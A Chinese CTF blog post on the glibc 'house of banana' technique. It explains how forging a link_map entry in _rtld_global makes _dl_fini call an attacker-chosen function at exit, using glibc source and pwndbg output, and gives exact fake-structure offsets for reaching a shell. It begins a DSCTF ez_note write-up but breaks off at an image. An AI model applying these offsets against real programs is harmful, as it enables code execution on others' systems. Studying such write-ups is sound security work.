<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="关于house of banana的一次利用, 1amfree">
    <meta name="description" content="关于house of banana的一次利用劫持的原理首先介绍一下house of banana的使用条件，使用house of banana一般是需要调用exit函数的，因为在调用链中exit--&amp;gt;__run_exit_handle">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="referrer" content="no-referrer-when-downgrade">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    
    <style>
        body{
            background-image: url(https://images7.alphacoders.com/480/480533.png);
            background-repeat:no-repeat;
            background-size: 100% 100%;
            background-attachment:fixed;
        }
    </style>


    <title>关于house of banana的一次利用 | 1amfree</title>
    <link rel="icon" type="image/jpeg" href="/medias/logo.jpeg">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery-3.6.0.min.js"></script>

<meta name="generator" content="Hexo 6.1.0"><link rel="stylesheet" href="/css/prism.css" type="text/css">
<link rel="stylesheet" href="/css/prism-line-numbers.css" type="text/css"></head>


<body>
    <!--  -->
    <link href="/libs/prism/prism.css" rel="stylesheet" type="text/css" />
    <script src="/libs/others/prism.js" type="text/javascript"></script>
    <!--  -->


    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.jpeg" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">1amfree</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.jpeg" class="logo-img circle responsive-img">
        
        <div class="logo-name">1amfree</div>
        <div class="logo-desc">
            
            我是大菜鸡，欢迎来到大菜鸡的博客
            
        </div>
    </div>

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
    </ul>
</div>


        </div>

        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/23.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">关于house of banana的一次利用</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        padding: 35px 0 15px 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        padding-bottom: 30px;
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #00fbff;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #00fbff;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/pwn/">
                                <span class="chip bg-color">pwn</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                    <div class="post-cate">
                        <i class="fas fa-bookmark fa-fw icon-category"></i>
                        
                            <a href="/categories/pwn/" class="post-category">
                                pwn
                            </a>
                        
                    </div>
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2022-07-17
                </div>
                

                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-check fa-fw"></i>更新日期:&nbsp;&nbsp;
                    2022-07-18
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>文章字数:&nbsp;&nbsp;
                    4.9k
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-clock fa-fw"></i>阅读时长:&nbsp;&nbsp;
                    22 分
                </div>
                

                
                    <div id="busuanzi_container_page_pv" class="info-break-policy">
                        <i class="far fa-eye fa-fw"></i>阅读次数:&nbsp;&nbsp;
                        <span id="busuanzi_value_page_pv"></span>
                    </div>
				
            </div>
        </div>
        <hr class="clearfix">

        
        <!-- 是否加载使用自带的 prismjs. -->
        <link rel="stylesheet" href="/libs/prism/prism.css">
        

        
        <!-- 代码块折行 -->
        <style type="text/css">
            code[class*="language-"], pre[class*="language-"] { white-space: pre-wrap !important; }
        </style>
        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h1 id="关于house-of-banana的一次利用"><a href="#关于house-of-banana的一次利用" class="headerlink" title="关于house of banana的一次利用"></a>关于house of banana的一次利用</h1><h2 id="劫持的原理"><a href="#劫持的原理" class="headerlink" title="劫持的原理"></a>劫持的原理</h2><p>首先介绍一下house of banana的使用条件，使用house of banana一般是需要调用exit函数的，因为在调用链中<code>exit--&gt;__run_exit_handlers--&gt;_dl_fini--&gt;((fini_t) array[i]) ()</code>,在dl_fini中调用<code>((fini_t) array[i]) ()</code>的过程中，会根据源码中<code>array = (l-&gt;l_addr + l-&gt;l_info[DT_FINI_ARRAY\]-&gt;d_un.d_ptr);</code>而来，而<code>l</code>又来自于<code>struct link_map *l = maps[i];</code></p>
<p>在这里贴上一些大佬的分析过程：</p>
<pre class="line-numbers language-c" data-language="c"><code class="language-c">    if (l-&gt;l_info[DT_FINI_ARRAY] !&#x3D; NULL)
&#123;
    ElfW(Addr) *array &#x3D;
    (ElfW(Addr) *) (l-&gt;l_addr
            + l-&gt;l_info[DT_FINI_ARRAY]-&gt;d_un.d_ptr);
    unsigned int i &#x3D; (l-&gt;l_info[DT_FINI_ARRAYSZ]-&gt;d_un.d_val
            &#x2F; sizeof (ElfW(Addr)));
    while (i-- &gt; 0)
    ((fini_t) array[i]) ();
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>可见在调用<code>((fini_t) array[i]) ();</code>之前，我们若是想要控制其调用，就需要控制<code>maps[i]</code>中的值，而<code>maps[i]</code>赋值过程来自于下面源码：</p>
<pre class="line-numbers language-C" data-language="C"><code class="language-C">define GL(name) _rtld_global._##name

for (l &#x3D; GL(dl_ns)[ns]._ns_loaded, i &#x3D; 0; l !&#x3D; NULL; l &#x3D; l-&gt;l_next)
&#x2F;* Do not handle ld.so in secondary namespaces.  *&#x2F;
if (l &#x3D;&#x3D; l-&gt;l_real)
    &#123;
assert (i &lt; nloaded);

maps[i] &#x3D; l;
l-&gt;l_idx &#x3D; i;
++i;

&#x2F;* Bump l_direct_opencount of all objects so that they
    are not dlclose()ed from underneath us.  *&#x2F;
++l-&gt;l_direct_opencount;
    &#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>从源码中我们不难看出，<code>maps[i]</code>的值来源于<code>l</code>，而<code>l</code>来源于<code>GL(dl_ns)[ns]._ns_loaded</code>并且还是一个循环赋值的过程，因此<code>l</code>的值还来源于<code>l-&gt;l_next</code>，可见<code>GL(dl_ns)[ns]._ns_loaded</code>是一个循环链表的头部，其中的节点都可以控制不同位置上的<code>maps[i]</code>值。</p>
<p>下面是大佬给出的分析：</p>
<p><code>maps</code>的元素是从<code>l</code>来，通过那个宏，说明<code>l</code>是从全局变量<code>_rtld_global._dl_ns[0]._ns_loaded</code>而来</p>
<pre class="line-numbers language-powershell" data-language="powershell"><code class="language-powershell">pwndbg&gt; p _rtld_global._dl_ns[0]
$2 &#x3D; &#123;
  _ns_loaded &#x3D; 0x7ffff7ffe168, 
  _ns_nloaded &#x3D; 4, 
  _ns_main_searchlist &#x3D; 0x7ffff7ffe420, 
  _ns_global_scope_alloc &#x3D; 0, 
  _ns_unique_sym_table &#x3D; &#123;
    lock &#x3D; &#123;
      mutex &#x3D; &#123;
        __data &#x3D; &#123;
          __lock &#x3D; 0, 
          __count &#x3D; 0, 
          __owner &#x3D; 0, 
          __nusers &#x3D; 0, 
          __kind &#x3D; 1, 
          __spins &#x3D; 0, 
          __elision &#x3D; 0, 
          __list &#x3D; &#123;
            __prev &#x3D; 0x0, 
            __next &#x3D; 0x0
          &#125;
        &#125;, 
        __size &#x3D; &#39;\000&#39; &lt;repeats 16 times&gt;, &quot;\001&quot;, &#39;\000&#39; &lt;repeats 22 times&gt;, 
        __align &#x3D; 0
      &#125;
    &#125;, 
    entries &#x3D; 0x0, 
    size &#x3D; 0, 
    n_elements &#x3D; 0, 
    free &#x3D; 0x0
  &#125;, 
  _ns_debug &#x3D; &#123;
    r_version &#x3D; 0, 
    r_map &#x3D; 0x0, 
    r_brk &#x3D; 0, 
    r_state &#x3D; RT_CONSISTENT, 
    r_ldbase &#x3D; 0
  &#125;
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>由for循环的<code>l = l-&gt;l_next</code>，说明其是个链表，只要把这个链表的指针覆盖，就可控制maps的元素，继而控制执行fini_array的执行。</p>
<h2 id="劫持过程"><a href="#劫持过程" class="headerlink" title="劫持过程"></a>劫持过程</h2><p>首先劫持大致上分为两种不同的情况，一种是对于链表头部的劫持，及对于<code>_ns_loaded</code>的劫持，还有一种是对于链表末尾，及第四个节点的劫持，及对于<code>_ns_loaded-&gt;l_next-&gt;l_next-&gt;l_next</code>的劫持。由于在链表的头部设置了链表的大小，及<code>_ns_nloaded = 4, 这里知名个这个链表的节点个数，在exit后面加载的检查中，会要求_ns_nloaded链表的节点不少于3个</code>，因此如果劫持头部的话，剩下的三个节点仍然需要伪造，如果仅仅劫持最后的一个节点，那么<code>l_next</code>设置为0即可。</p>
<h3 id="对于-ns-loaded的劫持条件："><a href="#对于-ns-loaded的劫持条件：" class="headerlink" title="对于_ns_loaded的劫持条件："></a>对于<code>_ns_loaded</code>的劫持条件：</h3><p>这里直接粘贴其他师傅分析给出的条件：</p>
<ul>
<li>这两个条件即可以看出，for要循环四次，maps[i]需要赋四个值。</li>
</ul>
<pre class="line-numbers language-C" data-language="C"><code class="language-C">assert (ns !&#x3D; LM_ID_BASE || i &#x3D;&#x3D; nloaded);
assert (ns &#x3D;&#x3D; LM_ID_BASE || i &#x3D;&#x3D; nloaded || i &#x3D;&#x3D; nloaded - 1);<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<ul>
<li><p><code>l-&gt;l_init_called</code>需要等于1,只占一位</p>
<pre class="line-numbers language-C" data-language="C"><code class="language-C">enum			&#x2F;* Where this object came from.  *&#x2F;
&#123;
	lt_executable,		&#x2F;* The main executable program.  *&#x2F;
	lt_library,		&#x2F;* Library needed by main executable.  *&#x2F;
	lt_loaded		&#x2F;* Extra run-time loaded shared object.  *&#x2F;
&#125; l_type:2;
unsigned int l_relocated:1;	&#x2F;* Nonzero if object&#39;s relocations done.  *&#x2F;
unsigned int l_init_called:1; &#x2F;* Nonzero if DT_INIT function called.  *&#x2F;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
</li>
<li><p><code>l-&gt;l_info[DT_FINI_ARRAY] != NULL|| l-&gt;l_info[DT_FINI] != NULL</code></p>
</li>
<li><p><code>l-&gt;l_addr</code>需要是目标函数的地址且<code>l-&gt;l_info[26]-&gt;d_un.d_ptr</code> 为0，<code>l-&gt;l_info[28]-&gt;d_un.d_val</code>为8</p>
<pre class="line-numbers language-C" data-language="C"><code class="language-C">ElfW(Addr) *array &#x3D;
			    (ElfW(Addr) *) (l-&gt;l_addr
					    + l-&gt;l_info[DT_FINI_ARRAY]-&gt;d_un.d_ptr);
			  unsigned int i &#x3D; (l-&gt;l_info[DT_FINI_ARRAYSZ]-&gt;d_un.d_val
					    &#x2F; sizeof (ElfW(Addr)));<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre></li>
</ul>
<h3 id="对于-rtld-global-dl-ns-ns-loaded-l-next-l-next-l-next的劫持条件："><a href="#对于-rtld-global-dl-ns-ns-loaded-l-next-l-next-l-next的劫持条件：" class="headerlink" title="对于_rtld_global._dl_ns._ns_loaded.l_next.l_next.l_next的劫持条件："></a>对于<code>_rtld_global._dl_ns._ns_loaded.l_next.l_next.l_next</code>的劫持条件：</h3><p>因为劫持_ns_loaded需要绕过两次assert()，比较麻烦，因此我们可以直接劫持<code>_rtld_global._dl_ns._ns_loaded.l_next.l_next.l_next</code>，将其修改为chunk的地址，破坏更小，绕过更简单。</p>
<p>和上面的方法大体一样</p>
<ul>
<li><p>我们需要将l_next置0</p>
<pre class="line-numbers language-C" data-language="C"><code class="language-C">assert (nloaded !&#x3D; 0 || GL(dl_ns)[ns]._ns_loaded &#x3D;&#x3D; NULL);<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
</li>
<li><p>为了能使maps[3]&#x3D;l，需要使l_real&#x3D;&#x3D;l</p>
</li>
<li><p><code>l-&gt;l_init_called</code>需要等于1,只占一位</p>
<pre class="line-numbers language-C" data-language="C"><code class="language-C">enum			&#x2F;* Where this object came from.  *&#x2F;
&#123;
	lt_executable,		&#x2F;* The main executable program.  *&#x2F;
	lt_library,		&#x2F;* Library needed by main executable.  *&#x2F;
	lt_loaded		&#x2F;* Extra run-time loaded shared object.  *&#x2F;
&#125; l_type:2;
unsigned int l_relocated:1;	&#x2F;* Nonzero if object&#39;s relocations done.  *&#x2F;
unsigned int l_init_called:1; &#x2F;* Nonzero if DT_INIT function called.  *&#x2F;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
</li>
<li><p><code>l-&gt;l_info[DT_FINI_ARRAY] != NULL|| l-&gt;l_info[DT_FINI] != NULL</code></p>
</li>
<li><p><code>l-&gt;l_addr</code>需要是目标函数的地址且<code>l-&gt;l_info[26]-&gt;d_un.d_ptr</code> 为0，<code>l-&gt;l_info[28]-&gt;d_un.d_val</code>为8</p>
<pre class="line-numbers language-C" data-language="C"><code class="language-C">ElfW(Addr) *array &#x3D;
			    (ElfW(Addr) *) (l-&gt;l_addr
					    + l-&gt;l_info[DT_FINI_ARRAY]-&gt;d_un.d_ptr);
			  unsigned int i &#x3D; (l-&gt;l_info[DT_FINI_ARRAYSZ]-&gt;d_un.d_val
					    &#x2F; sizeof (ElfW(Addr)));<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre></li>
</ul>
<p>但是我并没有使用这个师傅给出的劫持条件，首先的问题就是如果使用largebin_attack的话，那么最直接的问题就是<code>l-&gt;l_addr</code>处于攻击后chunk的头部分，有可能修改不到，还有就是我试了试这种的构造方法，好像并不太行，也不知道为什么……</p>
<h2 id="另一个师傅的劫持分析"><a href="#另一个师傅的劫持分析" class="headerlink" title="另一个师傅的劫持分析"></a>另一个师傅的劫持分析</h2><p>我的题目的主要构造来自于这个师傅的：<a target="_blank" rel="noopener" href="https://giles-one.github.io/2021/10/04/house-of-%E7%B3%BB%E5%88%97%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90/">https://giles-one.github.io/2021/10/04/house-of-%E7%B3%BB%E5%88%97%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90/</a></p>
<p>这位师傅采用的是对于<code>_rtld_global._dl_ns._ns_loaded.l_next.l_next.l_next</code>的劫持方式，我后面的题目构造主要来在于这位师傅。</p>
<p>下面全部来自这位师傅的劫持分析：</p>
<h3 id="开始劫持"><a href="#开始劫持" class="headerlink" title="开始劫持"></a>开始劫持</h3><pre class="line-numbers language-C" data-language="C"><code class="language-C">for (l &#x3D; GL(dl_ns)[ns]._ns_loaded, i &#x3D; 0; l !&#x3D; NULL; l &#x3D; l-&gt;l_next)
	    &#x2F;* Do not handle ld.so in secondary namespaces.  *&#x2F;
&#x2F;&#x2F; -------------------check0--------------------------------
    if (l &#x3D;&#x3D; l-&gt;l_real)
&#x2F;&#x2F; -------------------check0--------------------------------
    &#123;
    assert (i &lt; nloaded);

    maps[i] &#x3D; l;
    l-&gt;l_idx &#x3D; i;
    ++i;

    &#x2F;* Bump l_direct_opencount of all objects so that they
        are not dlclose()ed from underneath us.  *&#x2F;
    ++l-&gt;l_direct_opencount;
    &#125;
assert (ns !&#x3D; LM_ID_BASE || i &#x3D;&#x3D; nloaded);
assert (ns &#x3D;&#x3D; LM_ID_BASE || i &#x3D;&#x3D; nloaded || i &#x3D;&#x3D; nloaded - 1);<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>动态调试时发现maps必须要有四个元素，所以我劫持的是第三个节点的next指针这样不会破环长度从而绕过下面的两个断言。</p>
<pre class="line-numbers language-POWERSHELL" data-language="POWERSHELL"><code class="language-POWERSHELL">pwndbg&gt; distance &amp;_rtld_global &amp;(_rtld_global._dl_ns._ns_loaded-&gt;l_next-&gt;l_next-&gt;l_next)
0x7ffff7ffd040-&gt;0x7ffff7fdc018 is -0x21028 bytes (-0x4205 words)<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<p>劫持时只需在<code>_rtld_global-0x21028</code>处写入fake就行，这时可以参考large bin attack试试</p>
<p>另外为了能写入maps <code>maps[i] = l;</code>，需要绕过 check0，所以<code>fake+0x28</code>处要写入fake自己的地址</p>
<p>向下</p>
<pre class="line-numbers language-C" data-language="C"><code class="language-C">#define	DT_FINI_ARRAY	26		&#x2F;* Array with addresses of fini fct *&#x2F;
#define	DT_FINI_ARRAYSZ	28		&#x2F;* Size in bytes of DT_FINI_ARRAY *&#x2F;

  for (i &#x3D; 0; i &lt; nmaps; ++i)
	&#123;
	    struct link_map *l &#x3D; maps[i];
&#x2F;&#x2F; -------------------check1--------------------------------
	    if (l-&gt;l_init_called)
&#x2F;&#x2F; -------------------check1--------------------------------
		&#123;
		  &#x2F;* Make sure nothing happens if we are called twice.  *&#x2F;
		  l-&gt;l_init_called &#x3D; 0;

		  &#x2F;* Is there a destructor function?  *&#x2F;
&#x2F;&#x2F; -------------------check2--------------------------------
		  if (l-&gt;l_info[26] !&#x3D; NULL
		      || l-&gt;l_info[DT_FINI] !&#x3D; NULL)
&#x2F;&#x2F; -------------------check2--------------------------------
		    &#123;
                ....

&#x2F;&#x2F; -------------------check3--------------------------------
		        if (l-&gt;l_info[26] !&#x3D; NULL)
&#x2F;&#x2F; -------------------check3--------------------------------
                &#123;
                    array &#x3D; (l-&gt;l_addr + l-&gt;l_info[26]-&gt;d_un.d_ptr);
                    
                    i &#x3D; (l-&gt;l_info[28]-&gt;d_un.d_val &#x2F; 8));
                    
                    while (i-- &gt; 0)
                        ((fini_t) array[i]) ();
                &#125;
                ...
		    &#125;
        &#125;
    &#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>对于check1，是个枚举体中成员 l_init_called，由于各版本有所差异，所以还是现查现用</p>
<pre class="line-numbers language-POWERSHELL" data-language="POWERSHELL"><code class="language-POWERSHELL">pwndbg&gt; distance _rtld_global._dl_ns[0]._ns_loaded  &amp;(_rtld_global._dl_ns[0]._ns_loaded)-&gt;l_init_called 
0x7ffff7ffd040-&gt;0x7ffff7ffe47c is 0x314 bytes (0x287 words)
pwndbg&gt; x&#x2F;wx &amp;(_rtld_global._dl_ns[0]._ns_loaded)-&gt;l_init_called 
0x7ffff7ffe47c:	0x0000001c<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<p>所以 fake+0x143 &#x3D; 0x1c ，便可绕过</p>
<p>对于check2，check3只需<code>l-&gt;l_info[DT_FINI_ARRAY] != NULL</code> 便可绕过</p>
<pre class="line-numbers language-POWERSHELL" data-language="POWERSHELL"><code class="language-POWERSHELL">pwndbg&gt; distance  (_rtld_global._dl_ns[0]._ns_loaded)  &amp;((_rtld_global._dl_ns[0]._ns_loaded)-&gt;l_info[26])
0x7ffff7ffe168-&gt;0x7ffff7ffe278 is 0x110 bytes (0x22 words)<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<p>在fake+0x110 写入的内容会直接控制array</p>
<pre class="line-numbers language-POWERSHELL" data-language="POWERSHELL"><code class="language-POWERSHELL">pwndbg&gt; distance  (_rtld_global._dl_ns[0]._ns_loaded)  &amp;((_rtld_global._dl_ns[0]._ns_loaded)-&gt;l_info[28])
0x7ffff7ffe168-&gt;0x7ffff7ffe288 is 0x120 bytes (0x24 words)<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<p>在fake+0x120写入的内容会控制<code>i</code></p>
<p>只要把<code>fake+0x120，fake+0x110</code> 控制好就可以控制最后的<code>((fini_t) array[i]) ();</code></p>
<p>这是正常执行fini_array的流程，所以我们照着此进行伪造。</p>
<pre class="line-numbers language-powershell" data-language="powershell"><code class="language-powershell">pwndbg&gt; p&#x2F;x  *((_rtld_global._dl_ns[0]._ns_loaded)-&gt;l_info[26]) 
$16 &#x3D; &#123;
  d_tag &#x3D; 0x1a, 
  d_un &#x3D; &#123;
    d_val &#x3D; 0x600e18, 
    d_ptr &#x3D; 0x600e18
  &#125;
&#125;
pwndbg&gt; p&#x2F;x  ((_rtld_global._dl_ns[0]._ns_loaded)-&gt;l_info[26])-&gt;d_un.d_ptr
$18 &#x3D; 0x600e18
pwndbg&gt; telescope 0x600e18
00:0000│   0x600e18 (__do_global_dtors_aux_fini_array_entry) —▸ 0x400840 (__do_global_dtors_aux) ◂— cmp    byte ptr [rip + 0x200849], 0
01:0008│   0x600e20 (__JCR_LIST__) ◂— 0x0
02:0010│   0x600e28 (_DYNAMIC) ◂— 0x1
... ↓
04:0020│   0x600e38 (_DYNAMIC+16) ◂— 0xc &#x2F;* &#39;\x0c&#39; *&#x2F;
05:0028│   0x600e40 (_DYNAMIC+24) —▸ 0x400680 (_init) ◂— sub    rsp, 8
06:0030│   0x600e48 (_DYNAMIC+32) ◂— 0xd &#x2F;* &#39;\r&#39; *&#x2F;
07:0038│   0x600e50 (_DYNAMIC+40) —▸ 0x400b14 (_fini) ◂— sub    rsp, 8
pwndbg&gt; p&#x2F;x  *((_rtld_global._dl_ns[0]._ns_loaded)-&gt;l_info[28]) 
$19 &#x3D; &#123;
  d_tag &#x3D; 0x1c, 
  d_un &#x3D; &#123;
    d_val &#x3D; 0x8, 
    d_ptr &#x3D; 0x8
  &#125;
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>所以</p>
<p>需要在<code>fake+0x110</code>写入一个ptr，且ptr+0x8处有ptr2，ptr2处写入的是最后要执行的函数地址.</p>
<p>需要在<code>fake+0x120</code>写入一个ptr，且ptr+0x8处是<code>i*8</code>。</p>
<p>我选择的是<code>fake+0x110</code>写入<code>fake+0x40</code>，在<code>fake+0x48</code>写入<code>fake+0x58</code>，在<code>fake+0x58</code>写入shell</p>
<p>我选择在<code>fake+0x120</code>写入<code>fake+0x48</code>，在<code>fake+0x50</code>处写入8。</p>
<p>综上所述</p>
<ul>
<li>劫持<ul>
<li><code>&amp;(_rtld_global._dl_ns._ns_loaded-&gt;l_next-&gt;l_next-&gt;l_next) = fake</code></li>
</ul>
</li>
<li>check0<ul>
<li><code>fake+0x28 = fake</code></li>
</ul>
</li>
<li>check1<ul>
<li><code>fake+0x314 = 0x1c</code></li>
</ul>
</li>
<li>控制array<ul>
<li><code>fake+0x110 = fake+0x40</code></li>
<li><code>fake+0x48 = fake+0x58</code></li>
<li><code>fake+0x58 = shell</code></li>
</ul>
</li>
<li>控制i<ul>
<li><code>fake+0x120 = fake+0x48</code></li>
<li><code>fake+0x50 = 8</code></li>
</ul>
</li>
</ul>
<p>这位师傅是对于<code>_rtld_global._dl_ns._ns_loaded.l_next.l_next.l_next</code>的劫持，如果我们需要使用对于<code>_ns_loaded</code>的劫持，那么我们就需要伪造<code>link_map</code>结构体的<code>l_next</code>值，我们可以让他继续指向原先的下一个结构体。简单来说就是<code>fake+0x10 = l_next</code>。</p>
<p>经过我的观察，我个人感觉这种劫持的方式好像不能够直接采用调用system(“&#x2F;bin&#x2F;sh”)的方式，因为在连表查询时，rdi的值总是上一个链表节点的地址，因此”&#x2F;bin&#x2F;sh”的地址不便于控制。</p>
<p>下面我通过DSCTF的ez_note来进行分析：</p>
<h2 id="DSCTF-ez-note"><a href="#DSCTF-ez-note" class="headerlink" title="DSCTF ez_note"></a>DSCTF ez_note</h2><p>先简单分析一下漏洞的地方：</p>
<p><img src="/../pictures/house_of_banana/%E5%BE%AE%E4%BF%A1%E5%9B%BE%E7%89%87_20220718001553.png"></p>
